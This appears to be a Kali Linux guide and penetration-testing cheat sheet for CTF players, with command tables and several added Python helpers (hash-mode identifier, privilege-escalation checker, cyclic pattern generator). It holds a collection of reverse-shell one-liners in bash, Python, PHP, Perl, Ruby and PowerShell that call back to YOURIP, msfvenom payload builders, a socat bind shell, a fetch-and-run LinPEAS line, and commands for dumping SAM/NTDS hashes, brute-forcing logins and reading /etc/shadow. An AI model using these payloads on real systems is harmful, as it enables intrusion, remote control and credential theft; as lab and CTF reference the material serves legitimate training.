What Is Kali Linux?
Kali Linux is a Debian-based Linux distribution designed specifically for digital forensics, penetration testing, and security auditing. Maintained by Offensive Security, it comes pre-installed with over 600 security tools covering every phase of an engagement — from reconnaissance and enumeration to exploitation, post-exploitation, and reporting.
First released in 2013 as the successor to BackTrack Linux, Kali has become the de facto standard operating system for security professionals, ethical hackers, and CTF competitors worldwide. It is free, open source, and receives continuous updates.
Why Use Kali Linux?
- Hundreds of tools pre-installed, from nmap and Burp Suite to Ghidra and John the Ripper, right out of the box.

Where to Get Kali

- Docker: `docker pull kalilinux/kali-rolling`
- Virtual machine: download the pre-built `.ova` image and boot it up.

Getting Started — First Steps

- Update everything first: `sudo apt update && sudo apt full-upgrade -y`
- Pre-built images ship with the default credentials `kali:kali`. Change them immediately: `passwd`
- Learn the basics: `ls`, `cd`, `cat`, `grep`, `find`, `chmod`, `ssh`, pipes (`|`), and redirection (`>`, `>>`).
- Create a workspace: `mkdir ~/ctf`. Keep challenge files organized per competition. Install any additional tools you like with `sudo apt install <package>`.

Essential Tools Reference

| Command | Description |
|---|---|
| `nmap -sC -sV -oN scan.txt <target>` | Default scripts + service/version detection, normal output saved to a file |
| `gobuster dir -u http://target -w /usr/share/wordlists/dirb/common.txt` | Directory brute-force |
| `amass enum -d example.com` | Subdomain enumeration |
| `enum4linux -a <target>` | SMB/RPC enumeration (users, shares, policies) |
| `burpsuite` | Launch Burp Suite (intercepting web proxy) |
| `sqlmap -u "http://target/page?id=1" --dbs` | Automated SQL injection, enumerate databases |
| `nikto -h http://target` | Web server vulnerability scan |
| `wpscan --url http://target --enumerate vp,vt,u` | WordPress scan: vulnerable plugins, vulnerable themes, users |
| `msfconsole` | Launch the Metasploit console |
| `searchsploit apache 2.4` | Search the offline Exploit-DB copy |
| `john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt` | Crack hashes with John the Ripper |
| `hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt` | Crack MD5 hashes with hashcat (wordlist attack) |
| `hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://target` | Brute-force an SSH login |
| `wireshark` | Launch Wireshark (packet analyzer) |
| `sudo responder -I eth0` | Poison LLMNR/NBT-NS/mDNS on eth0 and capture NetNTLM hashes |
| `aircrack-ng -w /usr/share/wordlists/rockyou.txt capture.cap` | Crack a captured WPA handshake with a wordlist |
| `vol.py -f memory.dmp --profile=Win7SP1x64 pslist` | Volatility 2: list processes from a Windows 7 memory image |
| `binwalk -e suspicious_file.bin` | Extract embedded files from a binary blob |
| `steghide extract -sf image.jpg` | Extract data hidden with steghide |
| `ghidra` | Launch Ghidra (disassembler/decompiler) |
| `gdb -q ./binary` | Debug a binary with GDB |
| `r2 -A ./binary` | Open a binary in radare2 with analysis |

CTF Tips for Kali Users

- Extract the rockyou wordlist once: `sudo gunzip /usr/share/wordlists/rockyou.txt.gz`
- Install pwntools: `pip install pwntools` (current Kali marks the system Python as externally managed, so use `pipx install pwntools` or a virtualenv if pip refuses)
- Connect to the competition VPN with the provided `.ovpn` file: `sudo openvpn ctf.ovpn`
- Keep a reverse shell one-liner handy: `bash -i >& /dev/tcp/YOURIP/4444 0>&1`
- Upgrade a dumb shell to a TTY: `python3 -c 'import pty;pty.spawn("/bin/bash")'`

Kali Linux Cheat Sheet
A comprehensive quick-reference for the commands and techniques you'll use most often in CTFs and penetration testing. Bookmark this page — it covers everything from basic Linux navigation to advanced exploitation one-liners.
Linux Basics & File Operations

| Command | Description |
|---|---|
| `pwd` | Print current working directory |
| `ls -la` | List all files including hidden, with permissions |
| `cd /path/to/dir` | Change directory |
| `cp -r src dst` | Copy files/directories recursively |
| `mv old new` | Move or rename files |
| `rm -rf dir/` | Remove directory and contents recursively |
| `mkdir -p a/b/c` | Create nested directories |
| `find / -name "*.txt" 2>/dev/null` | Find files by name, suppress permission errors |
| `find / -perm -4000 2>/dev/null` | Find SUID binaries (privesc) |
| `locate filename` | Fast file search using the locate database (run `sudo updatedb` first) |
| `which nmap` | Show full path of a command |
| `cat file.txt` | Display file contents |
| `head -n 20 file` | Show first 20 lines |
| `tail -f /var/log/syslog` | Follow log output in real time |
| `less file.txt` | Paginated file viewer (`q` to quit) |
| `grep -rni "password" .` | Recursive case-insensitive search with line numbers |
| `grep -E "user\|pass\|token" file` | Search for multiple patterns (extended regex) |
| `sort file \| uniq -c \| sort -rn` | Count unique lines, sorted by frequency |
| `wc -l file.txt` | Count lines in a file |
| `diff file1 file2` | Compare two files line by line |
| `awk '{print $1}' file` | Print first column of each line |
| `sed 's/old/new/g' file` | Find and replace text (add `-i` to edit the file in place) |
| `cut -d':' -f1 /etc/passwd` | Extract first field (usernames) |
| `tr 'A-Z' 'a-z' < file` | Convert uppercase to lowercase |
| `xargs -I{} command {}` | Run command once per line of stdin, substituting `{}` |
Permissions & Users

| Command | Description |
|---|---|
| `chmod 755 file` | Set rwxr-xr-x permissions |
| `chmod +x script.sh` | Make file executable |
| `chmod u+s binary` | Set SUID bit on binary (it then runs with the owner's privileges) |
| `chown user:group file` | Change file owner and group |
| `whoami` | Current username |
| `id` | Show UID, GID, and group memberships |
| `sudo -l` | List commands the current user can run with sudo (privesc check) |
| `cat /etc/passwd` | List all system users |
| `cat /etc/shadow` | Password hashes (requires root) |
| `cat /etc/group` | List all groups |
| `getent passwd` | List users (including LDAP/NIS) |
| `w` | Show who is logged in and what they're doing |
| `last` | Show last logins |
Networking

| Command | Description |
|---|---|
| `ip a` | Show all network interfaces and IPs |
| `ip route` | Show routing table |
| `ss -tulnp` | Show listening TCP/UDP ports with process info |
| `netstat -antup` | Active connections with PIDs (legacy; `ss` is the replacement) |
| `ping -c 3 target` | Send 3 ICMP echo requests |
| `traceroute target` | Trace packet route to target |
| `dig example.com ANY` | DNS lookup, all record types (many servers now answer ANY with a minimal response, so query types individually if it comes back empty) |
| `dig @ns axfr example.com` | Attempt DNS zone transfer against nameserver `ns` |
| `host -t mx example.com` | Look up MX records |
| `whois example.com` | WHOIS registration lookup |
| `curl -sv https://target` | HTTP request with verbose headers |
| `curl -X POST -d 'data' url` | Send POST request with data |
| `wget -r -np http://target/dir/` | Recursively download directory |
| `nc -lvnp 4444` | Start netcat listener on port 4444 |
| `nc target 80` | Connect to target on port 80 |
| `socat TCP-LISTEN:4444,reuseaddr,fork EXEC:/bin/bash` | Bind shell with socat |
| `arp-scan -l` | Discover hosts on the local network (needs root) |
| `tcpdump -i eth0 -w capture.pcap` | Capture network traffic to file |
| `ssh -L 8080:127.0.0.1:80 user@target` | Local port forward: localhost:8080 reaches port 80 on target |
| `ssh -D 9050 user@target` | Dynamic SOCKS proxy via SSH |
| `sshuttle -r user@target 10.10.10.0/24` | VPN-like tunnel through SSH |
| `proxychains nmap target` | Run nmap through proxy chain |
Nmap Scanning

| Command | Description |
|---|---|
| `nmap -sn 10.10.10.0/24` | Ping sweep, discover live hosts |
| `nmap -sC -sV -oA scan target` | Default scripts + version detection, save all output formats |
| `nmap -p- target` | Scan all 65535 TCP ports |
| `nmap -sU --top-ports 100 target` | UDP scan of the top 100 ports (note the double dash; needs root) |
| `nmap -sS -T4 -Pn target` | SYN scan, aggressive timing, skip host discovery (needs root) |
| `nmap -O target` | OS detection |
| `nmap --script vuln target` | Run all vulnerability detection scripts |
| `nmap --script smb-enum-shares target` | Enumerate SMB shares |
| `nmap --script http-enum target` | Enumerate web directories/files |
| `nmap -sV --script=banner target` | Grab service banners |
| `nmap -p 445 --script 'smb-vuln*' target` | Check for SMB vulnerabilities (EternalBlue, etc.); quote the glob so the shell does not expand it |
Web Enumeration & Exploitation

| Command | Description |
|---|---|
| `gobuster dir -u http://target -w /usr/share/wordlists/dirb/common.txt -x php,html,txt` | Directory brute-force with file extensions |
| `gobuster dns -d target.com -w subdomains.txt` | Subdomain brute-force |
| `gobuster vhost -u http://target -w vhosts.txt` | Virtual host discovery |
| `ffuf -u http://target/FUZZ -w wordlist.txt -mc 200,301` | Fast web fuzzer, match only these status codes |
| `ffuf -u http://target -H "Host: FUZZ.target" -w subs.txt -fs 0` | Subdomain fuzzing via Host header, filter by response size (set the value to the size of the default vhost's response) |
| `feroxbuster -u http://target -w wordlist.txt -x php -d 2` | Recursive directory brute-force (depth 2) |
| `dirb http://target /usr/share/dirb/wordlists/big.txt` | Classic directory scanner |
| `wfuzz -c -z file,wordlist.txt --hc 404 http://target/FUZZ` | Web fuzzer, hide 404 responses |
| `nikto -h http://target -o report.html -Format html` | Web server scan with HTML report |
| `whatweb http://target` | Identify web technologies, CMS, frameworks |
| `wafw00f http://target` | Detect Web Application Firewall (WAF) |
| `sqlmap -u "http://target/page?id=1" --dbs --batch` | Automated SQL injection, enumerate databases (`--batch` accepts all defaults) |
| `sqlmap -u "url" -D dbname --tables` | List tables in a database |
| `sqlmap -u "url" -D db -T table --dump` | Dump table contents |
| `sqlmap -u "url" --os-shell` | Attempt OS shell via SQL injection |
| `sqlmap -r request.txt --batch` | SQL injection from a saved Burp request |
| `commix -u "http://target/page?cmd=test"` | Automated command injection testing |
| `xsser -u "http://target/search?q=test"` | Automated XSS detection |
Password Cracking & Brute-Force

| Command | Description |
|---|---|
| `john --wordlist=rockyou.txt hash.txt` | Crack hashes with John + wordlist |
| `john --show hash.txt` | Show cracked passwords |
| `john --format=raw-md5 hash.txt` | Specify hash format explicitly (`john --list=formats` lists them) |
| `unshadow passwd shadow > unshadowed.txt` | Combine passwd + shadow for John |
| `hashcat -m 0 hash.txt rockyou.txt` | MD5 (mode 0) |
| `hashcat -m 100 hash.txt rockyou.txt` | SHA1 (mode 100) |
| `hashcat -m 1000 hash.txt rockyou.txt` | NTLM (mode 1000) |
| `hashcat -m 1800 hash.txt rockyou.txt` | sha512crypt (`$6$`, mode 1800) |
| `hashcat -m 3200 hash.txt rockyou.txt` | bcrypt (mode 3200) |
| `hashcat -m 13100 hash.txt rockyou.txt` | Kerberoast TGS-REP, RC4 etype 23 (mode 13100) |
| `hashcat -m 5600 hash.txt rockyou.txt` | NetNTLMv2 (mode 5600) |
| `hashcat -a 3 -m 0 hash.txt ?a?a?a?a?a?a` | Brute-force mask attack, 6 characters from the full printable set |
| `hydra -l admin -P rockyou.txt ssh://target` | Brute-force SSH login |
| `hydra -l admin -P rockyou.txt target http-post-form "/login:user=^USER^&pass=^PASS^:F=incorrect"` | Brute-force web login form (`F=` is the string that marks a failed login) |
| `hydra -L users.txt -P pass.txt ftp://target` | FTP brute-force with user + pass lists |
| `hydra -l admin -P rockyou.txt rdp://target` | RDP brute-force |
| `hydra -l sa -P rockyou.txt target mssql` | MSSQL brute-force |
| `cewl http://target -d 3 -w custom_wordlist.txt` | Generate wordlist from website content (crawl depth 3) |
| `crunch 6 8 abc123 -o wordlist.txt` | Generate every 6-8 character string over the charset `abc123` |
| `hash-identifier` | Identify hash type interactively |
| `hashid hash_value` | Identify hash type from value (`-m` also prints the hashcat mode) |
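The table above maps formats to hashcat modes but leaves the identification step to `hashid`. The following script is an added example, not code from the original page or from the hashcat project: it recognises the formats listed above by their shape and returns the matching `-m` values. The sample hashes are constructed (the MD5, SHA1 and NTLM values are the real digests of the string "password"; the rest are synthetic strings of the right shape), the regexes are this example's approximations rather than hashcat's own parser, and a bare 32-hex digest is reported as both MD5 and NTLM because the string alone cannot tell them apart.

```python
import re

# Shape-based signatures for the modes in the table above, tried in order
# (most specific first).  These regexes are this example's approximations,
# not hashcat's parser, and deliberately cover only these modes.
SIGNATURES = [
    (re.compile(r"^\$krb5tgs\$23\$"), [(13100, "Kerberoast TGS-REP (RC4)")]),
    (re.compile(r"^\$2[aby]\$\d{2}\$[./A-Za-z0-9]{53}$"), [(3200, "bcrypt")]),
    (re.compile(r"^\$6\$(rounds=\d+\$)?[^$]{1,16}\$[./A-Za-z0-9]{86}$"), [(1800, "sha512crypt")]),
    (re.compile(r"^[^:]+::[^:]*:[0-9a-fA-F]{16}:[0-9a-fA-F]{32}:[0-9a-fA-F]+$"), [(5600, "NetNTLMv2")]),
    (re.compile(r"^[0-9a-fA-F]{40}$"), [(100, "SHA1")]),
    # 32 hex chars is MD5 *or* NTLM; only the source (web app dump vs. SAM) tells.
    (re.compile(r"^[0-9a-fA-F]{32}$"), [(0, "MD5"), (1000, "NTLM")]),
]


def identify(h):
    """Return [(hashcat_mode, name), ...] candidates for one hash string."""
    h = h.strip()
    for rx, modes in SIGNATURES:
        if rx.match(h):
            return list(modes)
    return []


def hashcat_command(hashfile, mode, wordlist="/usr/share/wordlists/rockyou.txt"):
    """Build the straight wordlist attack line used throughout the table."""
    return f"hashcat -m {mode} -a 0 {hashfile} {wordlist}"


# Constructed samples: real digests of "password" for the first two,
# synthetic strings of the correct shape for the rest.
SAMPLES = {
    "md5_or_ntlm": "5f4dcc3b5aa765d61d8327deb882cf99",
    "sha1": "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8",
    "bcrypt": "$2b$12$" + "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0",
    "sha512crypt": "$6$saltsalt$"
    + "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
    + "abcdefghijklmnopqrstuv",
    "netntlmv2": "admin::CORP:1122334455667788:" + "a1" * 16 + ":0101000000000000",
    "kerberoast": "$krb5tgs$23$*svc_sql$CORP.LOCAL$MSSQLSvc/db.corp.local*$"
    + "ab" * 16 + "$" + "cd" * 32,
}


def identify_samples():
    """Map each sample name to its list of candidate hashcat modes."""
    return {name: [mode for mode, _ in identify(value)] for name, value in SAMPLES.items()}


if __name__ == "__main__":
    for name, value in SAMPLES.items():
        for mode, label in identify(value):
            print(f"{name:12} {label:26} {hashcat_command('hash.txt', mode)}")
```

When a hash comes back ambiguous, the origin decides: a 32-hex value pulled from a web application's users table is almost always MD5 (mode 0), while one from `secretsdump` or a SAM dump is NTLM (mode 1000). Trying the wrong mode costs only a format error from hashcat, so when in doubt run both.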
Reverse Shells

| Command | Description |
|---|---|
| `bash -i >& /dev/tcp/YOURIP/4444 0>&1` | Bash reverse shell |
| `python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("YOURIP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'` | Python reverse shell |
| `php -r '$sock=fsockopen("YOURIP",4444);exec("/bin/sh -i <&3 >&3 2>&3");'` | PHP reverse shell (assumes the socket lands on file descriptor 3) |
| `nc -e /bin/bash YOURIP 4444` | Netcat reverse shell (needs a netcat built with `-e`) |
| `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f\|/bin/sh -i 2>&1\|nc YOURIP 4444 >/tmp/f` | Netcat reverse shell (no `-e`) |
| `perl -e 'use Socket;$i="YOURIP";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");'` | Perl reverse shell |
| `ruby -rsocket -e'f=TCPSocket.open("YOURIP",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'` | Ruby reverse shell |
| `powershell -NoP -NonI -W Hidden -Exec Bypass -Command "$c=New-Object System.Net.Sockets.TCPClient('YOURIP',4444);$s=$c.GetStream();[byte[]]$b=0..65535\|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1\|Out-String);$s.Write(([text.encoding]::ASCII.GetBytes($r)),0,$r.Length)}"` | PowerShell reverse shell |
| `python3 -c 'import pty;pty.spawn("/bin/bash")'` then Ctrl+Z → `stty raw -echo;fg` → `export TERM=xterm` | Upgrade to full TTY |
msfvenom Payloads

| Command | Description |
|---|---|
| `msfvenom -p linux/x64/shell_reverse_tcp LHOST=YOURIP LPORT=4444 -f elf -o rev.elf` | Linux ELF reverse shell (catch with `nc -lvnp 4444`) |
| `msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=YOURIP LPORT=4444 -f elf -o met.elf` | Linux Meterpreter (catch with `exploit/multi/handler`, payload set to match) |
| `msfvenom -p windows/x64/shell_reverse_tcp LHOST=YOURIP LPORT=4444 -f exe -o rev.exe` | Windows EXE reverse shell |
| `msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=YOURIP LPORT=4444 -f exe -o met.exe` | Windows Meterpreter |
| `msfvenom -p php/reverse_php LHOST=YOURIP LPORT=4444 -f raw -o shell.php` | PHP reverse shell |
| `msfvenom -p java/jsp_shell_reverse_tcp LHOST=YOURIP LPORT=4444 -f raw -o shell.jsp` | JSP reverse shell |
| `msfvenom -p java/jsp_shell_reverse_tcp LHOST=YOURIP LPORT=4444 -f war -o shell.war` | WAR reverse shell (deploy via Tomcat manager) |
| `msfvenom -p cmd/unix/reverse_python LHOST=YOURIP LPORT=4444 -f raw` | Python reverse shell payload, printed to stdout |
| `msfvenom -p windows/shell_reverse_tcp LHOST=YOURIP LPORT=4444 -f asp -o shell.asp` | ASP reverse shell |
Metasploit Console

| Command | Description |
|---|---|
| `msfconsole` | Launch Metasploit |
| `search type:exploit name:smb` | Search for SMB exploits |
| `use exploit/windows/smb/ms17_010_eternalblue` | Select a module |
| `show options` | Display required/optional settings |
| `set RHOSTS target` | Set target host |
| `set LHOST yourip` | Set listener IP |
| `set PAYLOAD windows/x64/meterpreter/reverse_tcp` | Set payload |
| `exploit` / `run` | Execute the exploit |
| `sessions -l` | List active sessions |
| `sessions -i 1` | Interact with session 1 |
| `background` | Background current session |
| `use post/multi/recon/local_exploit_suggester` | Suggest local privilege escalation exploits for a session |
Linux Privilege Escalation

| Command | Description |
|---|---|
| `sudo -l` | Check sudo permissions (first thing to check!) |
| `find / -perm -4000 2>/dev/null` | Find SUID binaries |
| `find / -perm -2000 2>/dev/null` | Find SGID binaries |
| `find / -writable -type f 2>/dev/null \| grep -v ^/proc` | Find files writable by the current user (`-perm -o+w` for world-writable only) |
| `getcap -r / 2>/dev/null` | Find binaries with file capabilities |
| `cat /etc/crontab` | Check cron jobs |
| `ls -la /etc/cron*` | List all cron directories |
| `systemctl list-timers` | List active systemd timers |
| `cat /etc/exports` | Check NFS shares (`no_root_squash` lets root on a client write files as root on the share) |
| `env` | Check environment variables for secrets |
| `cat /proc/version` | Kernel version (check for kernel exploits) |
| `uname -a` | System info: kernel, architecture |
| `ls -la /home/` | Check other users' home directories |
| `history` | Check command history for credentials |
| `cat ~/.bash_history` | Read bash history file |
| `find / -name "*.bak" -o -name "*.old" -o -name "*.conf" 2>/dev/null` | Find config/backup files |
| `ls -la /opt/ /var/backups/ /tmp/` | Check common directories for interesting files |
| `wget http://YOURIP/linpeas.sh -O /tmp/linpeas.sh && chmod +x /tmp/linpeas.sh && /tmp/linpeas.sh` | Download and run LinPEAS (automated privesc scanner) |
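Three of the checks above (`find / -perm -4000`, `cat /etc/exports`, `sudo -l`) are worth more than a raw listing, because what matters is the subset that is actually abusable. The script below is an added example, not code from the original page or from LinPEAS: it reimplements the SUID walk, parses `/etc/exports` for `no_root_squash`, and parses `sudo -l` output for `ALL` and shell-capable binaries. The `SHELL_CAPABLE` list and the sample `exports`/`sudo -l` text are constructed for the example; GTFOBins is the real reference for which binaries escape to a shell.

```python
import os
import re
import stat
import tempfile

# Binaries that hand out a shell or arbitrary file write when run via sudo.
# This short list is an assumption for the example; GTFOBins is the reference.
SHELL_CAPABLE = {"bash", "sh", "dash", "env", "vim", "vi", "less", "more", "find",
                 "awk", "python3", "python", "perl", "tar", "nmap", "cp", "tee"}


def find_suid(root="/"):
    """`find ROOT -perm -4000 2>/dev/null`: regular files with the setuid bit."""
    hits = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue                                   # the 2>/dev/null part
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def risky_exports(exports_text):
    """Parse /etc/exports and return (path, client) pairs exported with
    no_root_squash: root on an NFS client stays root on the share, so a
    SUID binary copied there runs as root on the server."""
    risky = []
    for line in exports_text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        path, *clients = line.split()
        for client in clients:
            m = re.fullmatch(r"([^(]*)\(([^)]*)\)", client)
            opts = m.group(2).split(",") if m else []
            if "no_root_squash" in opts:
                risky.append((path, m.group(1) or "*"))
    return risky


def risky_sudo(sudo_l_text):
    """Parse `sudo -l` output; flag ALL and shell-capable binaries, noting NOPASSWD."""
    findings = []
    for line in sudo_l_text.splitlines():
        m = re.match(r"\s*\((?P<runas>[^)]*)\)\s*(?P<nopasswd>NOPASSWD:\s*)?(?P<cmds>.+)", line)
        if not m:
            continue
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            binary = os.path.basename(cmd.split()[0])
            if cmd == "ALL" or binary in SHELL_CAPABLE:
                findings.append({"runas": m.group("runas"),
                                 "nopasswd": m.group("nopasswd") is not None,
                                 "cmd": cmd})
    return findings


# Constructed fixtures standing in for a real /etc/exports and `sudo -l` output.
SAMPLE_EXPORTS = """\
# /etc/exports
/srv/nfs/share   10.10.10.0/24(rw,sync,no_root_squash)
/srv/nfs/public  *(ro,sync,root_squash)
"""
SAMPLE_SUDO_L = """\
User kali may run the following commands on this host:
    (ALL : ALL) NOPASSWD: /usr/bin/vim, /usr/bin/id
    (root) /usr/bin/python3
"""


def suid_fixture():
    """Constructed tree with one setuid file, so find_suid can be exercised
    without root.  Returns the hits relative to the temporary root."""
    root = tempfile.mkdtemp(prefix="privesc_demo_")
    bindir = os.path.join(root, "usr", "bin")
    os.makedirs(bindir)
    for name, mode in (("fakesuid", 0o4755), ("plain", 0o755)):
        path = os.path.join(bindir, name)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, mode)                  # setuid on your own file needs no root
    return [os.path.relpath(p, root) for p in find_suid(root)]


if __name__ == "__main__":
    print("suid:", find_suid("/usr/bin"))
    print("nfs:", risky_exports(SAMPLE_EXPORTS))
    print("sudo:", risky_sudo(SAMPLE_SUDO_L))
```

On a real box replace the fixtures with `open("/etc/exports").read()` and the captured output of `sudo -l`; `find_suid("/")` is slow on large filesystems, which is why the one-liner in the table redirects errors rather than stopping at the first unreadable directory.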
Windows Privilege Escalation

| Command | Description |
|---|---|
| `whoami /all` | Current user, groups, privileges |
| `systeminfo` | OS version, hotfixes, architecture |
| `net user` | List local users |
| `net localgroup administrators` | List admin group members |
| `cmdkey /list` | Stored credentials |
| `reg query HKLM /f password /t REG_SZ /s` | Search registry for passwords |
| `schtasks /query /fo LIST /v` | List scheduled tasks (verbose) |
| `wmic service list brief` | List services (wmic is deprecated on current Windows; `sc query` or `Get-Service` works everywhere) |
| `sc qc ServiceName` | Query service config (unquoted binary path?) |
| `icacls "C:\path\to\service.exe"` | Check file permissions |
| `netstat -ano` | Active connections with PIDs |
| `dir /s /b C:\*.txt C:\*.ini C:\*.cfg 2>nul` | Search for config files |
| `type C:\Users\user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt` | PowerShell history |
| `winPEASx64.exe` | Automated Windows privesc scanner |
SMB & Active Directory

| Command | Description |
|---|---|
| `smbclient -L //target -N` | List SMB shares (null session) |
| `smbclient //target/share -U user` | Connect to SMB share |
| `smbmap -H target` | Enumerate share permissions |
| `smbmap -H target -u user -p pass -r share` | Recursively list share contents |
| `crackmapexec smb target -u user -p pass` | Validate credentials against SMB (`netexec`/`nxc` is the maintained successor with the same syntax) |
| `crackmapexec smb target -u user -p pass --shares` | List shares with credentials |
| `crackmapexec smb target -u user -p pass -M spider_plus` | Spider all shares for files |
| `enum4linux -a target` | Full SMB/RPC enumeration |
| `rpcclient -U '' -N target` | Null session RPC connection |
| `impacket-GetNPUsers domain/ -usersfile users.txt -dc-ip DC -format hashcat` | AS-REP Roast: hashes for accounts without pre-auth (hashcat mode 18200) |
| `impacket-GetUserSPNs domain/user:pass -dc-ip DC -request` | Kerberoast: request TGS tickets (hashcat mode 13100) |
| `impacket-secretsdump domain/user:pass@target` | Dump SAM / NTDS.dit hashes |
| `impacket-psexec domain/user:pass@target` | Remote shell via SMB (admin required) |
| `impacket-wmiexec domain/user:pass@target` | Remote shell via WMI |
| `evil-winrm -i target -u user -p pass` | WinRM shell (port 5985) |
| `bloodhound-python -c all -u user -p pass -d domain -ns DC` | Collect AD data for BloodHound |
File Transfer

| Command | Description |
|---|---|
| `python3 -m http.server 8080` | Start Python HTTP server (serves the current directory) |
| `wget http://YOURIP:8080/file -O /tmp/file` | Download file with wget (Linux) |
| `curl http://YOURIP:8080/file -o /tmp/file` | Download file with curl (Linux) |
| `nc -lvnp 4444 < file` → `nc YOURIP 4444 > file` | Transfer via Netcat (sender → receiver) |
| `Invoke-WebRequest -Uri http://YOURIP:8080/file -OutFile C:\temp\file` | PowerShell download |
| `iwr http://YOURIP:8080/file -OutFile C:\temp\file` | PowerShell download (short alias) |
| `certutil -urlcache -split -f http://YOURIP:8080/file C:\temp\file` | Certutil download (Windows) |
| `scp file user@target:/tmp/file` | Secure copy via SSH |
| `base64 file > encoded.txt` → `base64 -d encoded.txt > file` | Base64 encode/decode transfer (paste through a shell) |
| `impacket-smbserver share . -smb2support` → `copy \\YOURIP\share\file .` | SMB server via Impacket (attacker) and copy from it (Windows target) |
Forensics & Steganography

| Command | Description |
|---|---|
| `file mystery_file` | Identify file type from magic bytes |
| `strings -n 8 file` | Extract printable strings (min 8 chars) |
| `strings -e l file` | Extract 16-bit little-endian (UTF-16LE) strings, as found in Windows binaries |
| `xxd file \| head -50` | Hex dump, first 50 lines |
| `hexdump -C file \| head` | Hex + ASCII dump |
| `binwalk file` | Scan for embedded files/signatures |
| `binwalk -e file` | Extract embedded files |
| `binwalk --dd=".*" file` | Force extract all detected types |
| `foremost -i file -o output/` | Carve files from binary data |
| `steghide info image.jpg` | Check if image has hidden data |
| `steghide extract -sf image.jpg` | Extract hidden data from image |
| `stegseek image.jpg rockyou.txt` | Brute-force steghide password |
| `zsteg image.png` | Detect stego in PNG/BMP (LSB, etc.) |
| `exiftool image.jpg` | Read/write metadata (EXIF, GPS, etc.) |
| `pngcheck -v image.png` | Validate PNG structure, check for errors |
| `identify -verbose image.png` | ImageMagick: detailed image info |
| `photorec image.dd` | Recover files from disk image |
| `volatility -f mem.dmp imageinfo` | Identify memory dump profile (Volatility 2; Volatility 3 needs no profile) |
| `volatility -f mem.dmp --profile=X pslist` | List processes from memory (Volatility 3: `vol -f mem.dmp windows.pslist`) |
| `volatility -f mem.dmp --profile=X filescan` | Scan for file objects in memory (Volatility 3: `windows.filescan`) |
| `volatility -f mem.dmp --profile=X hashdump` | Extract password hashes from memory (Volatility 3: `windows.hashdump`) |
Reverse Engineering & Binary Exploitation

| Command | Description |
|---|---|
| `objdump -d binary` | Disassemble binary |
| `objdump -x binary` | Display all headers |
| `readelf -a binary` | ELF header info (sections, symbols) |
| `nm binary` | List symbols |
| `ldd binary` | List shared library dependencies |
| `ltrace ./binary` | Trace library calls |
| `strace ./binary` | Trace system calls |
| `gdb -q ./binary` | Start GDB in quiet mode |
| `gdb: break main` | Set breakpoint at main() |
| `gdb: run` | Run the program |
| `gdb: disas main` | Disassemble main function |
| `gdb: x/20wx $esp` | Examine 20 words at the stack pointer (`$rsp` and `x/20gx` on x86-64) |
| `gdb: info registers` | Show all register values |
| `gdb: set {int}0xaddr = value` | Write value to memory address |
| `gdb: pattern create 200` | Generate cyclic pattern (PEDA syntax; GEF uses `pattern create`/`pattern search`, pwndbg uses `cyclic`/`cyclic -l`) |
| `gdb: pattern offset $eip` | Find offset to the EIP overwrite (`$rip` on x86-64) |
| `r2 -A ./binary` | Radare2: open with analysis |
| `r2: afl` | List functions |
| `r2: pdf @main` | Disassemble main |
| `r2: VV @main` | Visual graph mode |
| `checksec ./binary` | Check binary protections (NX, PIE, canary, RELRO) |
| `ROPgadget --binary ./binary` | Find ROP gadgets |
| `one_gadget /lib/x86_64-linux-gnu/libc.so.6` | Find one-shot execve gadgets in libc |
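The `pattern create` / `pattern offset` pair above works because the pattern is a de Bruijn sequence: every 4-byte window occurs exactly once, so the bytes that land in a crashed register identify a unique position in the input. The following is an added example, not from the original page or from any of the debugger plugins named above, that implements both commands in plain Python (the same construction and default alphabet pwntools uses) so the offset can be recovered without a debugger plugin, including from a 64-bit register value where only the low four bytes are pattern bytes.

```python
import itertools

ALPHABET = "abcdefghijklmnopqrstuvwxyz"   # the default alphabet pwntools uses


def de_bruijn(alphabet, n):
    """Lazily yield a de Bruijn sequence B(k, n): every length-n string over the
    alphabet appears exactly once (Ruskey's algorithm, as in pwntools.cyclic)."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for i in a[1:p + 1]:
                    yield alphabet[i]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic(length, n=4, alphabet=ALPHABET):
    """`pattern create LENGTH`: the first LENGTH bytes of the pattern."""
    return "".join(itertools.islice(de_bruijn(alphabet, n), length))


def cyclic_find(value, n=4, alphabet=ALPHABET, search_limit=0x10000):
    """`pattern offset VALUE`: where the crashed register's bytes sit in the pattern.
    Accepts an int as read from gdb (little-endian, so 0x6161616b is b"kaaa") or
    raw bytes.  Only the first n bytes are matched, which is why a 64-bit
    register such as $rip still resolves.  Returns -1 if not found."""
    if isinstance(value, int):
        width = 8 if value > 0xFFFFFFFF else 4
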